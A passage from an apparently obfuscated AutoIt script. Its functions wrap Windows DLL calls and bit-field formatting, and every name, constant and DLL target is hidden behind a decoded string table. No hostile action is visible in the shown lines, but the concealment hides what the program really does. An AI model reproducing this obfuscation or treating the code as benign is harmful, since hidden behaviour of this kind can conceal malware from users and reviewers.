  5236.     Local $a505a20190d = DllCall($a020bd10d22, $a1d0be15f47, $a610bf15432, $a0f1b01285c, $a3a0bb1194d, $a5a1b111d40, $a3d0bc1170a)
  5237.     If @error Then Return SetError(@error, @extended, Number($a411b213e22))
  5238.     Return $a505a20190d[Number($a091b312961)]
  5239. EndFunc
  5240.  
  5241. Func a2f1170155c($a591b411146, $a601b510602)
  5242.     If NOT IsDeclared("SSA2F1170155C") Then
  5243.         Global $a491b715927 = a2b00005424($os[4735]), $a561b811234 = a2b00005424($os[4736]), $a011b914d48 = a2b00005424($os[4737]), $a431ba11060 = a2b00005424($os[4738]), $a281bb13524 = a2b00005424($os[4739]), $a5c1bc15a30 = a2b00005424($os[4740]), $a181bd13842 = a2b00005424($os[4741]), $a241be1045c = a2b00005424($os[4742])
  5244.         Global $ssa2f1170155c = 1
  5245.     EndIf
  5246.     Local $a571b616044 = DllStructCreate($a383840554a)
  5247.     Local $a505a20190d = DllCall($a491b715927, $a561b811234, $a011b914d48, $a431ba11060, $a591b411146, $a281bb13524, $a601b510602, $a5c1bc15a30, $a571b616044)
  5248.     If @error Then Return SetError(@error, @extended, Number($a181bd13842))
  5249.     Return SetExtended($a505a20190d[Number($a241be1045c)], $a571b616044)
  5250. EndFunc
  5251.  
  5252. Func a311180083f($a561bf14e4a)
  5253.     If NOT IsDeclared("SSA311180083F") Then
  5254.         Global $a2c2b11281d = a2b00005424($os[4743]), $a2b2b211a0f = a2b00005424($os[4744]), $a532b313907 = a2b00005424($os[4745]), $a5f2b413331 = a2b00005424($os[4746]), $a3e2b51061e = a2b00005424($os[4747]), $a392b614a34 = a2b00005424($os[4748]), $a612b710c1f = a2b00005424($os[4749]), $a0b2b81094b = a2b00005424($os[4750]), $a422b911661 = a2b00005424($os[4751]), $a592ba13416 = a2b00005424($os[4752])
  5255.         Global $ssa311180083f = 1
  5256.     EndIf
  5257.     Local $a612b010003[Number($a2c2b11281d)]
  5258.     $a612b010003[Number($a2b2b211a0f)] = BitAND($a561bf14e4a, Number($a532b313907))
  5259.     $a612b010003[Number($a5f2b413331)] = BitAND(BitShift($a561bf14e4a, Number($a3e2b51061e)), Number($a392b614a34))
  5260.     $a612b010003[Number($a612b710c1f)] = BitAND(BitShift($a561bf14e4a, Number($a0b2b81094b)), Number($a422b911661)) + Number($a592ba13416)
  5261.     Return $a612b010003
  5262. EndFunc
  5263.  
  5264. Func a2611903e22($a561bf14e4a, $a532bb13142)
  5265.     If NOT IsDeclared("SSA2611903E22") Then
  5266.         Global $a542bc1140e = a2b00005424($os[4753]), $a032bd1343c = a2b00005424($os[4754]), $a582be13127 = a2b00005424($os[4755]), $a2e2bf10c48 = a2b00005424($os[4756]), $a413b01212b = a2b00005424($os[4757]), $a173b11335f = a2b00005424($os[4758]), $a1f3b21585a = a2b00005424($os[4759]), $a3a3b313520 = a2b00005424($os[4760]), $a603b415107 = a2b00005424($os[4761]), $a153b51155d = a2b00005424($os[4762]), $a053b610b17 = a2b00005424($os[4763]), $a4f3b715836 = a2b00005424($os[4764]), $a1d3b815c48 = a2b00005424($os[4765]), $a243b915b1c = a2b00005424($os[4766]), $a513ba15649 = a2b00005424($os[4767]), $a113bb13502 = a2b00005424($os[4768]), $a273bc14241 = a2b00005424($os[4769]), $a343bd16158 = a2b00005424($os[4770]), $a623be1161a = a2b00005424($os[4771])
  5267.         Global $ssa2611903e22 = 1
  5268.     EndIf
  5269.     Local $a612b010003[Number($a542bc1140e)]
  5270.     $a612b010003[Number($a032bd1343c)] = BitAND($a561bf14e4a, Number($a582be13127))
  5271.     $a612b010003[Number($a2e2bf10c48)] = BitAND(BitShift($a561bf14e4a, Number($a413b01212b)), Number($a173b11335f))
  5272.     $a612b010003[Number($a1f3b21585a)] = BitAND(BitShift($a561bf14e4a, Number($a3a3b313520)), Number($a603b415107)) + Number($a153b51155d)
  5273.     $a612b010003[Number($a053b610b17)] = BitAND($a532bb13142, Number($a4f3b715836)) * Number($a1d3b815c48)
  5274.     $a612b010003[Number($a243b915b1c)] = BitAND(BitShift($a532bb13142, Number($a513ba15649)), Number($a113bb13502))
  5275.     $a612b010003[Number($a273bc14241)] = BitAND(BitShift($a532bb13142, Number($a343bd16158)), Number($a623be1161a))
  5276.     Return $a612b010003
  5277. EndFunc
  5278.  
  5279. Func a1111a03b34($a561bf14e4a, $a532bb13142)
  5280.     If NOT IsDeclared("SSA1111A03B34") Then
  5281.         Global $a5a3bf11f44 = a2b00005424($os[4772]), $a554b01491a = a2b00005424($os[4773]), $a534b11451c = a2b00005424($os[4774]), $a2a4b213e11 = a2b00005424($os[4775]), $a514b313834 = a2b00005424($os[4776]), $a014b41433a = a2b00005424($os[4777]), $a384b515858 = a2b00005424($os[4778])
  5282.         Global $ssa1111a03b34 = 1
  5283.     EndIf
  5284.     Local $a612b010003 = a2611903e22($a561bf14e4a, $a532bb13142)
  5285.     Return StringFormat($a5a3bf11f44, $a612b010003[Number($a554b01491a)], $a612b010003[Number($a534b11451c)], $a612b010003[Number($a2a4b213e11)], $a612b010003[Number($a514b313834)], $a612b010003[Number($a014b41433a)], $a612b010003[Number($a384b515858)])
  5286. EndFunc
  5287.  
  5288. Func a4011b0520d($a561bf14e4a)
  5289.     If NOT IsDeclared("SSA4011B0520D") Then
  5290.         Global $a0d4b61094b = a2b00005424($os[4779]), $a284b711234 = a2b00005424($os[4780]), $a194b81082b = a2b00005424($os[4781]), $a064b91422b = a2b00005424($os[4782])
  5291.         Global $ssa4011b0520d = 1
  5292.     EndIf
  5293.     Local $a612b010003 = a311180083f($a561bf14e4a)
  5294.     Return StringFormat($a0d4b61094b, $a612b010003[Number($a284b711234)], $a612b010003[Number($a194b81082b)], $a612b010003[Number($a064b91422b)])
  5295. EndFunc
  5296.  
  5297. Func a0111c02e38($a532bb13142)
  5298.     If NOT IsDeclared("SSA0111C02E38") Then
  5299.         Global $a234bb10a27 = a2b00005424($os[4783]), $a4e4bc12659 = a2b00005424($os[4784]), $a5e4bd1083e = a2b00005424($os[4785]), $a124be15007 = a2b00005424($os[4786]), $a204bf1512c = a2b00005424($os[4787]), $a1e5b011f4a = a2b00005424($os[4788]), $a365b115843 = a2b00005424($os[4789]), $a575b21265f = a2b00005424($os[4790]), $a005b311049 = a2b00005424($os[4791]), $a265b411f60 = a2b00005424($os[4792])
  5300.         Global $ssa0111c02e38 = 1
  5301.     EndIf
  5302.     Local $a594ba16051[Number($a234bb10a27)]
  5303.     $a594ba16051[Number($a4e4bc12659)] = BitAND($a532bb13142, Number($a5e4bd1083e)) * Number($a124be15007)
  5304.     $a594ba16051[Number($a204bf1512c)] = BitAND(BitShift($a532bb13142, Number($a1e5b011f4a)), Number($a365b115843))
  5305.     $a594ba16051[Number($a575b21265f)] = BitAND(BitShift($a532bb13142, Number($a005b311049)), Number($a265b411f60))
  5306.     Return $a594ba16051
  5307. EndFunc
  5308.  
  5309. Func a0a11d04b2c($a532bb13142)
  5310.     If NOT IsDeclared("SSA0A11D04B2C") Then
  5311.         Global $a0e5b515252 = a2b00005424($os[4793]), $a255b614a23 = a2b00005424($os[4794]), $a005b71142e = a2b00005424($os[4795]), $a045b811517 = a2b00005424($os[4796])
  5312.         Global $ssa0a11d04b2c = 1
  5313.     EndIf
  5314.     Local $a594ba16051 = a0111c02e38($a532bb13142)
  5315.     Return StringFormat($a0e5b515252, $a594ba16051[Number($a255b614a23)], $a594ba16051[Number($a005b71142e)], $a594ba16051[Number($a045b811517)])
  5316. EndFunc
  5317.  
  5318. Func a0711e03415($a4069e1164d, $a4b69f11d1e, $a4c37114838, $a4e3ac10705 = 0, $a193ad1413c = 0, $a263ae10815 = 0, $a3c5b914753 = 0)
  5319.     Local $a3f2af1105a = a6211f0355f($a4069e1164d, $a4b69f11d1e, $a4c37114838, $a4e3ac10705, $a193ad1413c, $a263ae10815, $a3c5b914753)
  5320.     Return a2f31602441($a3f2af1105a)
  5321. EndFunc
  5322.  
  5323. Func a6211f0355f($a4069e1164d, $a4b69f11d1e, $a4c37114838, $a4e3ac10705 = 0, $a193ad1413c = 0, $a263ae10815 = 0, $a3c5b914753 = 0)
  5324.     If NOT IsDeclared("SSA6211F0355F") Then
  5325.         Global $a495ba1594a = a2b00005424($os[4797]), $a485bb13e49 = a2b00005424($os[4798]), $a4b5bc12624 = a2b00005424($os[4799]), $a2a5bd13d44 = a2b00005424($os[4800]), $a145be15c46 = a2b00005424($os[4801]), $a555bf1573e = a2b00005424($os[4802]), $a526b01381d = a2b00005424($os[4803])
  5326.         Global $ssa6211f0355f = 1
  5327.     EndIf
  5328.     Local $a3f2af1105a = DllStructCreate($a3538605c61)
  5329.     DllStructSetData($a3f2af1105a, $a495ba1594a, $a4069e1164d)
  5330.     DllStructSetData($a3f2af1105a, $a485bb13e49, $a4b69f11d1e)
  5331.     DllStructSetData($a3f2af1105a, $a4b5bc12624, $a4c37114838)
  5332.     DllStructSetData($a3f2af1105a, $a2a5bd13d44, $a4e3ac10705)
  5333.     DllStructSetData($a3f2af1105a, $a145be15c46, $a193ad1413c)
  5334.     DllStructSetData($a3f2af1105a, $a555bf1573e, $a263ae10815)
  5335.     DllStructSetData($a3f2af1105a, $a526b01381d, $a3c5b914753)
  5336.     Return $a3f2af1105a
  5337. EndFunc
  5338.  
  5339. Func a262100025e(ByRef $a426b111f50)
  5340.     If NOT IsDeclared("SSA262100025E") Then
  5341.         Global $a1f6b215e02 = a2b00005424($os[4804]), $a3f6b312d15 = a2b00005424($os[4805]), $a446b415d2f = a2b00005424($os[4806]), $a086b515a54 = a2b00005424($os[4807]), $a046b611f22 = a2b00005424($os[4808]), $a116b715a49 = a2b00005424($os[4809]), $a136b814c4a = a2b00005424($os[4810])
  5342.         Global $ssa262100025e = 1
  5343.     EndIf
  5344.     If ((DllStructGetData($a426b111f50, Number($a1f6b215e02)) + DllStructGetData($a426b111f50, Number($a3f6b312d15))) = Number($a446b415d2f)) Then Return SetError(Number($a086b515a54), Number($a046b611f22), Number($a116b715a49))
  5345.     Local $a3f2af1105a = a2321402225($a426b111f50)
  5346.     If @error Then Return SetError(@error, @extended, Number($a136b814c4a))
  5347.     Return a5031303817($a3f2af1105a)
  5348. EndFunc
  5349.  
  5350. Func a2121101e0f(ByRef $a426b111f50, $a0e6b913c1d = 0)
  5351.     If NOT IsDeclared("SSA2121101E0F") Then
  5352.         Global $a4c6ba15e4c = a2b00005424($os[4811]), $a086bb12355 = a2b00005424($os[4812]), $a4f6bc12658 = a2b00005424($os[4813]), $a036bd13f07 = a2b00005424($os[4814]), $a006be11900 = a2b00005424($os[4815]), $a636bf10c14 = a2b00005424($os[4816]), $a5e7b01593b = a2b00005424($os[4817]), $a527b114a41 = a2b00005424($os[4818]), $a2f7b21231c = a2b00005424($os[4819]), $a2f7b310435 = a2b00005424($os[4820]), $a247b414b28 = a2b00005424($os[4821]), $a507b510b0a = a2b00005424($os[4822]), $a2c7b610957 = a2b00005424($os[4823]), $a1a7b71142f = a2b00005424($os[4824])
  5353.         Global $ssa2121101e0f = 1
  5354.     EndIf
  5355.     Local $a612b010003 = a262100025e($a426b111f50)
  5356.     If @error Then Return SetError(@error, @extended, "")
  5357.     If $a0e6b913c1d Then
  5358.         Return StringFormat($a4c6ba15e4c, $a612b010003[Number($a086bb12355)], $a612b010003[Number($a4f6bc12658)], $a612b010003[Number($a036bd13f07)], $a612b010003[Number($a006be11900)], $a612b010003[Number($a636bf10c14)], $a612b010003[Number($a5e7b01593b)])
  5359.     Else
  5360.         Return StringFormat($a527b114a41, $a612b010003[Number($a2f7b21231c)], $a612b010003[Number($a2f7b310435)], $a612b010003[Number($a247b414b28)], $a612b010003[Number($a507b510b0a)], $a612b010003[Number($a2c7b610957)], $a612b010003[Number($a1a7b71142f)])
  5361.     EndIf
  5362. EndFunc
  5363.  
  5364. Func a6221203251($a207b814e2f)
  5365.     If NOT IsDeclared("SSA6221203251") Then
  5366.         Global $a017b91262a = a2b00005424($os[4825]), $a227ba13c29 = a2b00005424($os[4826]), $a317bb15959 = a2b00005424($os[4827]), $a517bc14c08 = a2b00005424($os[4828]), $a377bd15f06 = a2b00005424($os[4829]), $a467be14156 = a2b00005424($os[4830]), $a4c7bf11e19 = a2b00005424($os[4831]), $a508b011223 = a2b00005424($os[4832]), $a128b111400 = a2b00005424($os[4833]), $a178b211829 = a2b00005424($os[4834]), $a628b313139 = a2b00005424($os[4835]), $a118b415d35 = a2b00005424($os[4836]), $a168b510a60 = a2b00005424($os[4837]), $a468b613953 = a2b00005424($os[4838])
  5367.         Global $ssa6221203251 = 1
  5368.     EndIf
  5369.     Local $a612b010003[Number($a017b91262a)]
  5370.     Local $a505a20190d = DllCall($a227ba13c29, $a317bb15959, $a517bc14c08, $a377bd15f06, $a207b814e2f, $a467be14156, Number($a4c7bf11e19), $a508b011223, Number($a128b111400))
  5371.     If @error Then Return SetError(@error, @extended, $a612b010003)
  5372.     $a612b010003[Number($a178b211829)] = $a505a20190d[Number($a628b313139)]
  5373.     $a612b010003[Number($a118b415d35)] = $a505a20190d[Number($a168b510a60)]
  5374.     Return SetExtended($a505a20190d[Number($a468b613953)], $a612b010003)
  5375. EndFunc
  5376.  
  5377. Func a002130303c($a207b814e2f)
  5378.     If NOT IsDeclared("SSA002130303C") Then
  5379.         Global $a228b81051e = a2b00005424($os[4839]), $a178b910454 = a2b00005424($os[4840]), $a298ba1044d = a2b00005424($os[4841]), $a1c8bb15b3b = a2b00005424($os[4842]), $a278bc13c61 = a2b00005424($os[4843]), $a5a8bd1375b = a2b00005424($os[4844]), $a1f8be11d22 = a2b00005424($os[4845])
  5380.         Global $ssa002130303c = 1
  5381.     EndIf
  5382.     Local $a1d8b712a2a = DllStructCreate($a383840554a)
  5383.     Local $a505a20190d = DllCall($a228b81051e, $a178b910454, $a298ba1044d, $a1c8bb15b3b, $a207b814e2f, $a278bc13c61, $a1d8b712a2a)
  5384.     If @error Then Return SetError(@error, @extended, Number($a5a8bd1375b))
  5385.     Return SetExtended($a505a20190d[Number($a1f8be11d22)], $a1d8b712a2a)
  5386. EndFunc
  5387.  
  5388. Func a2321402225($a207b814e2f)
  5389.     If NOT IsDeclared("SSA2321402225") Then
  5390.         Global $a079b013928 = a2b00005424($os[4846]), $a289b11215f = a2b00005424($os[4847]), $a609b21543d = a2b00005424($os[4848]), $a3c9b31463a = a2b00005424($os[4849]), $a269b412f58 = a2b00005424($os[4850]), $a4c9b511507 = a2b00005424($os[4851]), $a249b610c5e = a2b00005424($os[4852])
  5391.         Global $ssa2321402225 = 1
  5392.     EndIf
  5393.     Local $a1f8bf10c12 = DllStructCreate($a3538605c61)
  5394.     Local $a505a20190d = DllCall($a079b013928, $a289b11215f, $a609b21543d, $a3c9b31463a, $a207b814e2f, $a269b412f58, $a1f8bf10c12)
  5395.     If @error Then Return SetError(@error, @extended, Number($a4c9b511507))
  5396.     Return SetExtended($a505a20190d[Number($a249b610c5e)], $a1f8bf10c12)
  5397. EndFunc
  5398.  
  5399. Func a3721501312($a28cec03a24)
  5400.     If NOT IsDeclared("SSA3721501312") Then
  5401.         Global $a3e9b710c24 = a2b00005424($os[4853]), $a5d9b81453e = a2b00005424($os[4854]), $a359b91522d = a2b00005424($os[4855]), $a4e9ba11536 = a2b00005424($os[4856]), $a1a9bb1333d = a2b00005424($os[4857]), $a089bc11a24 = a2b00005424($os[4858]), $a0b9bd10b35 = a2b00005424($os[4859]), $a279be1231c = a2b00005424($os[4860]), $a3b9bf14d01 = a2b00005424($os[4861]), $a23ab013530 = a2b00005424($os[4862]), $a63ab11463e = a2b00005424($os[4863]), $a4bab21143b = a2b00005424($os[4864]), $a23ab312b5f = a2b00005424($os[4865]), $a4fab41252d = a2b00005424($os[4866]), $a36ab510024 = a2b00005424($os[4867]), $a60ab61531e = a2b00005424($os[4868])
  5402.         Global $ssa3721501312 = 1
  5403.     EndIf
  5404.     Local $a612b010003[Number($a3e9b710c24)]
  5405.     $a612b010003[Number($a5d9b81453e)] = DllStructCreate($a383840554a)
  5406.     $a612b010003[Number($a359b91522d)] = DllStructCreate($a383840554a)
  5407.     $a612b010003[Number($a4e9ba11536)] = DllStructCreate($a383840554a)
  5408.     Local $a505a20190d = DllCall($a1a9bb1333d, $a089bc11a24, $a0b9bd10b35, $a279be1231c, $a28cec03a24, $a3b9bf14d01, $a612b010003[Number($a23ab013530)], $a63ab11463e, $a612b010003[Number($a4bab21143b)], $a23ab312b5f, $a612b010003[Number($a4fab41252d)])
  5409.     If @error Then Return SetError(@error, @extended, Number($a36ab510024))
  5410.     Return SetExtended($a505a20190d[Number($a60ab61531e)], $a612b010003)
  5411. EndFunc
  5412.  
  5413. Func a0f21601e11()
  5414.     If NOT IsDeclared("SSA0F21601E11") Then
  5415.         Global $a3fab711336 = a2b00005424($os[4869]), $a47ab816227 = a2b00005424($os[4870]), $a36ab913f33 = a2b00005424($os[4871]), $a0faba1602d = a2b00005424($os[4872]), $a45abb11855 = a2b00005424($os[4873])
  5416.         Global $ssa0f21601e11 = 1
  5417.     EndIf
  5418.     Local $a1f8bf10c12 = DllStructCreate($a3538605c61)
  5419.     DllCall($a3fab711336, $a47ab816227, $a36ab913f33, $a0faba1602d, $a1f8bf10c12)
  5420.     If @error Then Return SetError(@error, @extended, Number($a45abb11855))
  5421.     Return $a1f8bf10c12
  5422. EndFunc
  5423.  
  5424. Func a3d2170185f()
  5425.     If NOT IsDeclared("SSA3D2170185F") Then
  5426.         Global $a15abc1520f = a2b00005424($os[4874]), $a14abd1403c = a2b00005424($os[4875]), $a44abe13409 = a2b00005424($os[4876]), $a01abf12214 = a2b00005424($os[4877]), $a58bb015337 = a2b00005424($os[4878])
  5427.         Global $ssa3d2170185f = 1
  5428.     EndIf
  5429.     Local $a1f8bf10c12 = DllStructCreate($a3538605c61)
  5430.     DllCall($a15abc1520f, $a14abd1403c, $a44abe13409, $a01abf12214, $a1f8bf10c12)
  5431.     If @error Then Return SetError(@error, @extended, Number($a58bb015337))
  5432.     Return $a1f8bf10c12
  5433. EndFunc
  5434.  
  5435. Func a5321801c39()
  5436.     If NOT IsDeclared("SSA5321801C39") Then
  5437.         Global $a5fbb211c1c = a2b00005424($os[4879]), $a17bb314f50 = a2b00005424($os[4880]), $a44bb415f2b = a2b00005424($os[4881]), $a30bb513b4f = a2b00005424($os[4882]), $a14bb613d23 = a2b00005424($os[4883]), $a4bbb713d12 = a2b00005424($os[4884]), $a3bbb813b2d = a2b00005424($os[4885]), $a0bbb915124 = a2b00005424($os[4886]), $a4ebba11c1c = a2b00005424($os[4887]), $a2fbbb12a04 = a2b00005424($os[4888]), $a4dbbc12f24 = a2b00005424($os[4889]), $a22bbd12b26 = a2b00005424($os[4890]), $a48bbe13002 = a2b00005424($os[4891]), $a01bbf15427 = a2b00005424($os[4892]), $a4ccb01273c = a2b00005424($os[4893]), $a32cb113a42 = a2b00005424($os[4894]), $a0ecb212e61 = a2b00005424($os[4895]), $a06cb311d4b = a2b00005424($os[4896]), $a52cb413103 = a2b00005424($os[4897])
  5438.         Global $ssa5321801c39 = 1
  5439.     EndIf
  5440.     Local $a2fbb115443[Number($a5fbb211c1c)]
  5441.     Local $a505a20190d = DllCall($a17bb314f50, $a44bb415f2b, $a30bb513b4f, $a14bb613d23, Number($a4bbb713d12), $a3bbb813b2d, Number($a0bbb915124), $a4ebba11c1c, Number($a2fbbb12a04))
  5442.     If @error Then Return SetError(@error, @extended, Number($a4dbbc12f24))
  5443.     $a2fbb115443[Number($a22bbd12b26)] = $a505a20190d[Number($a48bbe13002)]
  5444.     $a2fbb115443[Number($a01bbf15427)] = $a505a20190d[Number($a4ccb01273c)]
  5445.     $a2fbb115443[Number($a32cb113a42)] = $a505a20190d[Number($a0ecb212e61)] <> Number($a06cb311d4b)
  5446.     Return SetExtended($a505a20190d[Number($a52cb413103)], $a2fbb115443)
  5447. EndFunc
  5448.  
  5449. Func a3621900900()
  5450.     If NOT IsDeclared("SSA3621900900") Then
  5451.         Global $a1acb514761 = a2b00005424($os[4898]), $a1ccb61542e = a2b00005424($os[4899]), $a20cb715c09 = a2b00005424($os[4900]), $a4bcb811d17 = a2b00005424($os[4901]), $a28cb915534 = a2b00005424($os[4902])
  5452.         Global $ssa3621900900 = 1
  5453.     EndIf
  5454.     Local $a426b111f50 = DllStructCreate($a383840554a)
  5455.     DllCall($a1acb514761, $a1ccb61542e, $a20cb715c09, $a4bcb811d17, $a426b111f50)
  5456.     If @error Then Return SetError(@error, @extended, Number($a28cb915534))
  5457.     Return $a426b111f50
  5458. EndFunc
  5459.  
  5460. Func a0921a02e22()
  5461.     If NOT IsDeclared("SSA0921A02E22") Then
  5462.         Global $a4ccba13e18 = a2b00005424($os[4903]), $a02cbb1263e = a2b00005424($os[4904]), $a4ccbc12e07 = a2b00005424($os[4905]), $a09cbd1613a = a2b00005424($os[4906]), $a4dcbe15a05 = a2b00005424($os[4907]), $a0acbf16145 = a2b00005424($os[4908]), $a57db010c27 = a2b00005424($os[4909]), $a46db114412 = a2b00005424($os[4910]), $a4adb210263 = a2b00005424($os[4911]), $a08db315927 = a2b00005424($os[4912]), $a12db41602b = a2b00005424($os[4913]), $a07db512546 = a2b00005424($os[4914]), $a16db615931 = a2b00005424($os[4915]), $a0adb712130 = a2b00005424($os[4916]), $a54db811629 = a2b00005424($os[4917])
  5463.         Global $ssa0921a02e22 = 1
  5464.     EndIf
  5465.     Local $a2fbb115443[Number($a4ccba13e18)]
  5466.     $a2fbb115443[Number($a02cbb1263e)] = DllStructCreate($a383840554a)
  5467.     $a2fbb115443[Number($a4ccbc12e07)] = DllStructCreate($a383840554a)
  5468.     $a2fbb115443[Number($a09cbd1613a)] = DllStructCreate($a383840554a)
  5469.     Local $a505a20190d = DllCall($a4dcbe15a05, $a0acbf16145, $a57db010c27, $a46db114412, $a2fbb115443[Number($a4adb210263)], $a08db315927, $a2fbb115443[Number($a12db41602b)], $a07db512546, $a2fbb115443[Number($a16db615931)])
  5470.     If @error Then Return SetError(@error, @extended, Number($a0adb712130))
  5471.     Return SetExtended($a505a20190d[Number($a54db811629)], $a2fbb115443)
  5472. EndFunc
  5473.  
  5474. Func a3b21b03215()
  5475.     If NOT IsDeclared("SSA3B21B03215") Then
  5476.         Global $a55db91151a = a2b00005424($os[4918]), $a3fdba10643 = a2b00005424($os[4919]), $a1edbb14328 = a2b00005424($os[4920]), $a35dbc14e28 = a2b00005424($os[4921]), $a4adbd14042 = a2b00005424($os[4922])
  5477.         Global $ssa3b21b03215 = 1
  5478.     EndIf
  5479.     Local $a505a20190d = DllCall($a55db91151a, $a3fdba10643, $a1edbb14328)
  5480.     If @error Then Return SetError(@error, @extended, Number($a35dbc14e28))
  5481.     Return $a505a20190d[Number($a4adbd14042)]
  5482. EndFunc
  5483.  
  5484. Func a2621c0241d()
  5485.     If NOT IsDeclared("SSA2621C0241D") Then
  5486.         Global $a03dbf16219 = a2b00005424($os[4923]), $a28eb01350c = a2b00005424($os[4924]), $a22eb110042 = a2b00005424($os[4925]), $a52eb215b18 = a2b00005424($os[4926]), $a30eb312621 = a2b00005424($os[4927]), $a4ceb411e39 = a2b00005424($os[4928]), $a59eb514757 = a2b00005424($os[4929]), $a49eb61350d = a2b00005424($os[4930]), $a20eb713b4d = a2b00005424($os[4931]), $a2feb814d5a = a2b00005424($os[4932]), $a15eb91513c = a2b00005424($os[4933]), $a4beba10553 = a2b00005424($os[4934]), $a2eebb11910 = a2b00005424($os[4935]), $a5cebc10e17 = a2b00005424($os[4936]), $a30ebd12d42 = a2b00005424($os[4937]), $a26ebe14f37 = a2b00005424($os[4938]), $a31ebf12a55 = a2b00005424($os[4939]), $a56fb014f54 = a2b00005424($os[4940]), $a31fb110e05 = a2b00005424($os[4941]), $a36fb21000c = a2b00005424($os[4942]), $a0ffb31340e = a2b00005424($os[4943]), $a1bfb41450d = a2b00005424($os[4944]), $a4afb51224f = a2b00005424($os[4945]), $a61fb612219 = a2b00005424($os[4946])
  5487.         Global $ssa2621c0241d = 1
  5488.     EndIf
  5489.     Local $a0fdbe11233 = DllStructCreate($a6138802415)
  5490.     Local $a505a20190d = DllCall($a03dbf16219, $a28eb01350c, $a22eb110042, $a52eb215b18, $a0fdbe11233)
  5491.     If @error OR $a505a20190d[Number($a30eb312621)] = -Number($a4ceb411e39) Then Return SetError(@error, @extended, Number($a59eb514757))
  5492.     Local $a2fbb115443[Number($a49eb61350d)]
  5493.     $a2fbb115443[Number($a20eb713b4d)] = $a505a20190d[Number($a2feb814d5a)]
  5494.     $a2fbb115443[Number($a15eb91513c)] = DllStructGetData($a0fdbe11233, $a4beba10553)
  5495.     $a2fbb115443[Number($a2eebb11910)] = a3ec0b05a5d(DllStructGetPtr($a0fdbe11233, $a5cebc10e17))
  5496.     $a2fbb115443[Number($a30ebd12d42)] = a2111501e2e(DllStructGetPtr($a0fdbe11233, $a26ebe14f37))
  5497.     $a2fbb115443[Number($a31ebf12a55)] = DllStructGetData($a0fdbe11233, $a56fb014f54)
  5498.     $a2fbb115443[Number($a31fb110e05)] = a3ec0b05a5d(DllStructGetPtr($a0fdbe11233, $a36fb21000c))
  5499.     $a2fbb115443[Number($a0ffb31340e)] = a2111501e2e(DllStructGetPtr($a0fdbe11233, $a1bfb41450d))
  5500.     $a2fbb115443[Number($a4afb51224f)] = DllStructGetData($a0fdbe11233, $a61fb612219)
  5501.     Return $a2fbb115443
  5502. EndFunc
  5503.  
  5504. Func a4121d03d47($a0efb715d2f)
  5505.     If NOT IsDeclared("SSA4121D03D47") Then
  5506.         Global $a13fb81324b = a2b00005424($os[4947]), $a3ffb913209 = a2b00005424($os[4948]), $a60fba10b2e = a2b00005424($os[4949]), $a3cfbb11708 = a2b00005424($os[4950]), $a1dfbc1334a = a2b00005424($os[4951]), $a45fbd11262 = a2b00005424($os[4952]), $a04fbe11036 = a2b00005424($os[4953])
  5507.         Global $ssa4121d03d47 = 1
  5508.     EndIf
  5509.     Local $a426b111f50 = DllStructCreate($a383840554a)
  5510.     Local $a505a20190d = DllCall($a13fb81324b, $a3ffb913209, $a60fba10b2e, $a3cfbb11708, $a0efb715d2f, $a1dfbc1334a, $a426b111f50)
  5511.     If @error Then Return SetError(@error, @extended, Number($a45fbd11262))
  5512.     Return SetExtended($a505a20190d[Number($a04fbe11036)], $a426b111f50)
  5513. EndFunc
  5514.  
  5515. Func a0e21e02b5e($a28cec03a24, $a02fbf11b2c, $a240c01305d, $a550c11365c)
  5516.     If NOT IsDeclared("SSA0E21E02B5E") Then
  5517.         Global $a600c213824 = a2b00005424($os[4954]), $a4a0c314d39 = a2b00005424($os[4955]), $a1f0c41043d = a2b00005424($os[4956]), $a460c514e5e = a2b00005424($os[4957]), $a100c615b58 = a2b00005424($os[4958]), $a230c710949 = a2b00005424($os[4959]), $a110c81063a = a2b00005424($os[4960]), $a080c915c05 = a2b00005424($os[4961])
  5518.         Global $ssa0e21e02b5e = 1
  5519.     EndIf
  5520.     Local $a505a20190d = DllCall($a600c213824, $a4a0c314d39, $a1f0c41043d, $a460c514e5e, $a28cec03a24, $a100c615b58, $a02fbf11b2c, $a230c710949, $a240c01305d, $a110c81063a, $a550c11365c)
  5521.     If @error Then Return SetError(@error, @extended, False)
  5522.     Return $a505a20190d[Number($a080c915c05)]
  5523. EndFunc
  5524.  
  5525. Func a5921f03c42($a1dfa811711)
  5526.     If NOT IsDeclared("SSA5921F03C42") Then
  5527.         Global $a120ca1195c = a2b00005424($os[4962]), $a3a0cb12340 = a2b00005424($os[4963]), $a540cc1511a = a2b00005424($os[4964]), $a330cd13715 = a2b00005424($os[4965]), $a180ce10607 = a2b00005424($os[4966]), $a070cf15041 = a2b00005424($os[4967]), $a291c01221e = a2b00005424($os[4968]), $a591c114327 = a2b00005424($os[4969]), $a0f1c215f3d = a2b00005424($os[4970]), $a1b1c312715 = a2b00005424($os[4971])
  5528.         Global $ssa5921f03c42 = 1
  5529.     EndIf
  5530.     Local $a505a20190d = DllCall($a120ca1195c, $a3a0cb12340, $a540cc1511a, $a330cd13715, $a1dfa811711)
  5531.     If @error OR NOT $a505a20190d[Number($a180ce10607)] Then Return SetError(@error, @extended, False)
  5532.     $a505a20190d = DllCall($a070cf15041, $a291c01221e, $a591c114327, $a0f1c215f3d, $a1dfa811711)
  5533.     If @error Then Return SetError(@error, @extended, False)
  5534.     Return $a505a20190d[Number($a1b1c312715)]
  5535. EndFunc
  5536.  
  5537. Func a5631000f39($a1dfa811711)
  5538.     If NOT IsDeclared("SSA5631000F39") Then
  5539.         Global $a401c411549 = a2b00005424($os[4972]), $a4e1c512a0b = a2b00005424($os[4973]), $a161c610e0c = a2b00005424($os[4974]), $a0a1c710160 = a2b00005424($os[4975]), $a361c816321 = a2b00005424($os[4976])
  5540.         Global $ssa5631000f39 = 1
  5541.     EndIf
  5542.     Local $a505a20190d = DllCall($a401c411549, $a4e1c512a0b, $a161c610e0c, $a0a1c710160, $a1dfa811711)
  5543.     If @error Then Return SetError(@error, @extended, False)
  5544.     Return $a505a20190d[Number($a361c816321)]
  5545. EndFunc
  5546.  
  5547. Func a0b31101311($a0d1c910a17, $a4c1ca1122b)
  5548.     If NOT IsDeclared("SSA0B31101311") Then
  5549.         Global $a581cb1040a = a2b00005424($os[4977]), $a101cc12723 = a2b00005424($os[4978]), $a541cd10e47 = a2b00005424($os[4979]), $a601ce12e0d = a2b00005424($os[4980]), $a041cf10008 = a2b00005424($os[4981]), $a522c013303 = a2b00005424($os[4982]), $a432c110a08 = a2b00005424($os[4983]), $a372c214b1e = a2b00005424($os[4984]), $a092c313f1a = a2b00005424($os[4985]), $a602c411646 = a2b00005424($os[4986])
  5550.         Global $ssa0b31101311 = 1
  5551.     EndIf
